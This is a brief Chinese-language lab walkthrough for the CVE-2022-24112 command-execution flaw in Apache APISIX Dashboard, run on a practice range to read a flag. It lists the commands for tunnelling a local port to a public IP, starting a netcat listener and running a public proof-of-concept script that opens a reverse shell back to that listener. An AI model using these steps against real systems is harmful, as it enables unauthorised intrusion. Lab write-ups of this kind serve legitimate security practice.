基于春秋云镜免费空间测试
1,使用隧道代理软件将本地端口如8888映射到公网访问(自行百度这里不能说)
2,使用netcat -lvnp 8888监听本地端口
3,调用POC这里参考了文章:Apache APISIX Dashboard(CVE-2022-24112)命令执行漏洞方式利用 (qq.com)
git clone https://github.com/twseptian/cve-2022-24112 ##获取POC
cd cve-2022-24112/poc/ ##进入相应目录
chmod +x poc2.py ##添权限
python3 poc2.py -t eci-2zecqo925diajhkbbasa.cloudeci1.ichunqiu.com(春秋云镜打开的靶场地址,有端口加后面参数-p后面) -p 9080 -L +隧道代理的公网ip -P +隧道代理的公网ip端口
4,然后在本地监听的netcat里cat /flag即可
可以参考以下文章